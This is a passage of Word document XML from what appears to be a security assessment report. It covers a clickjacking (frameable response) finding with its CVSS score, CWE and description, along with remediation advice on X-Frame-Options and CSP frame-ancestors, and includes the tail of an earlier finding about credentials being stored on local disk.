                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D45A38">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:b/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Image Caption:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="49905E79" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The below image shows the username and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>userDn</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> values being stored on local disk storage. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4285349A" w14:textId="77777777" w:rsidR="00D45A38" w:rsidRPr="00D45A38" w:rsidRDefault="00D45A38" w:rsidP="00A82FF7">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3E3DDADD" wp14:editId="6164E95D">
                  <wp:extent cx="4562475" cy="19621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252" t="65319" r="13018" b="6293"/>
                          <a:stretch/>
                        </pic:blipFill>
                        <pic:spPr bwMode="auto">
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4562475" cy="1962150"/>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tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2C8D849B" w14:textId="77777777" w:rsidR="00304781" w:rsidRPr="00397EF0" w:rsidRDefault="00304781" w:rsidP="00D246C9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C24E77A" w14:textId="77777777" w:rsidR="00CF0DE5" w:rsidRPr="00397EF0" w:rsidRDefault="00CF0DE5" w:rsidP="00CF0DE5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:i/>
          <w:color w:val="auto"/>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9594" w:type="dxa"/>
        <w:tblBorders>
          <w:insideH w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        </w:tblBorders>
        <w:tblLayout w:type="fixed"/>
        <w:tblCellMar>
          <w:left w:w="115" w:type="dxa"/>
          <w:right w:w="115" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2005"/>
        <w:gridCol w:w="7589"/>
      </w:tblGrid>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="7859A861" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:trPr>
          <w:trHeight w:val="432"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9594" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F79646"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3ED123DD" w14:textId="61A81E54" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00A82FF7" w:rsidP="00F03F96">
            <w:pPr>
              <w:pStyle w:val="Heading2"/>
            </w:pPr>
            <w:bookmarkStart w:id="11" w:name="_Toc10703672"/>
            <w:r>
              <w:t>M3</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidR="002E6AAF">
              <w:t>Frameable</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00983E25">
              <w:t xml:space="preserve"> Response/Clickjacking</w:t>
            </w:r>
            <w:r w:rsidR="00983E25" w:rsidRPr="00397EF0">
              <w:t xml:space="preserve"> – </w:t>
            </w:r>
            <w:r w:rsidR="00983E25">
              <w:t>Open</w:t>
            </w:r>
            <w:bookmarkEnd w:id="11"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="6F4A74F9" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="229D7BF0"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CVSS Score and Link</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EA872D8" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="0098400D" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:hyperlink r:id="rId22" w:anchor="CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N" w:history="1">
              <w:r w:rsidR="00983E25" w:rsidRPr="00E5265D">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>4.7</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="01367458" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="1676709E"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CWE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="58CB1020" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>CWE-693: Protection Mechanism Failure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="1B9ED763" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="211A09D8"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Affected Systems</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EF86DF2" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00397EF0" w:rsidRDefault="002E67F3" w:rsidP="00F03F96">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="left" w:pos="2258"/>
              </w:tabs>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Systemic</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="6996F67D" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="37B9B394"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Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="DAEEF3" w:themeFill="accent5" w:themeFillTint="33"/>
          </w:tcPr>
          <w:p w14:paraId="6A2AFA99" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The applications allows itself to be loaded into a frame. Risk:  If a page fails to set an appropriate X-Frame-Options or Content-Security-Policy HTTP header, it might be possible for a page controlled by an attacker to load it within an iframe. This may enable a clickjacking attack, in which the attacker's page overlays the target application's interface with a different interface provided by the attacker. By inducing victim users to perform actions such as mouse clicks and keystrokes, the attacker can cause them to unwittingly carry out actions within the application that is being targeted. This technique allows the attacker to circumvent defenses against cross-site request forgery, and may result in unauthorized actions.    </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0DDCA484" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">References:   </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64A002C4" w14:textId="77777777" w:rsidR="00F03F96" w:rsidRPr="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>OWASP: Clickjacking (</w:t>
            </w:r>
            <w:hyperlink r:id="rId23" w:history="1">
              <w:r w:rsidR="00AA4501" w:rsidRPr="004B64A5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://www.owasp.org/index.php/Clickjacking</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F03F96" w:rsidRPr="00397EF0" w14:paraId="561D02BD" w14:textId="77777777" w:rsidTr="00F03F96">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2005" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F7AF8B8"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lastRenderedPageBreak/>
              <w:t>Recommendations</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7589" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BA4867C" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00F03F96">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">There are two ways of fixing the Clickjacking vulnerability:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="41C7FC24" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">(RECOMMENDED) X-FRAME-OPTIONS Response Header: This header determines if the browser is allowed to render a page in a frame or an iframe. The application can thus make sure that the malicious websites are not loading its content inside their frames. There are 3 possible values for the header: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3020DAA7" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a. DENY - which denies framing of the content by all domains, including current site </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77710FE2" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">b. SAMEORIGIN - only the current site can frame the content </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="477B3B6D" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="15"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>c. ALLOW-FROM &amp;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>lt</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>;uri</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>&amp;gt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">; - which allows the specified URI to frame the content.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5DA394D8" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ALL the HTTP responses should have this header set to an appropriate value to prevent Clickjacking.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="679210E9" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:left="720"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">2. Content-Security-Policy Response Header: The 'frame-ancestors' directive in this header works in the same way as X-FRAME-OPTIONS header. It tells the browser whether to render the page in a frame/iframe or not. There are 3 possible values here as well: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="699FB0CE" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:left="1440"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">a. 'none' - which prevents any domain from framing the content </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E4EB9D6" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:left="1440"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">b. 'self' - which allows only current site to frame the content </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1D3C08E8" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:ind w:left="1440"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>c. 'self','</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>uri</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">' - which allows the current site and the mentioned URI to frame the content.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="232E6EAB" w14:textId="77777777" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">References:  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47586D6A" w14:textId="2AB348D4" w:rsidR="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00AA4501">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Mozilla Developer Network (</w:t>
            </w:r>
            <w:hyperlink r:id="rId24" w:history="1">
              <w:r w:rsidR="00A82FF7" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/X-Frame-Options</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>) (</w:t>
            </w:r>
            <w:hyperlink r:id="rId25" w:history="1">
              <w:r w:rsidR="00A82FF7" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                  <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                  <w:sz w:val="20"/>
                  <w:szCs w:val="20"/>
                </w:rPr>
                <w:t>https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP</w:t>
              </w:r>
            </w:hyperlink>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">)  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="266A4670" w14:textId="4E6C910C" w:rsidR="00F03F96" w:rsidRPr="00AA4501" w:rsidRDefault="00983E25" w:rsidP="00A82FF7">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="14"/>
              </w:numPr>
              <w:spacing w:before="120" w:after="120"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AA4501">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>OWASP (</w:t>
            </w:r>
            <w:hyperlink r:id="rId26" w:history="1">
              <w:r w:rsidR="00A82FF7" w:rsidRPr="00E823E6">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
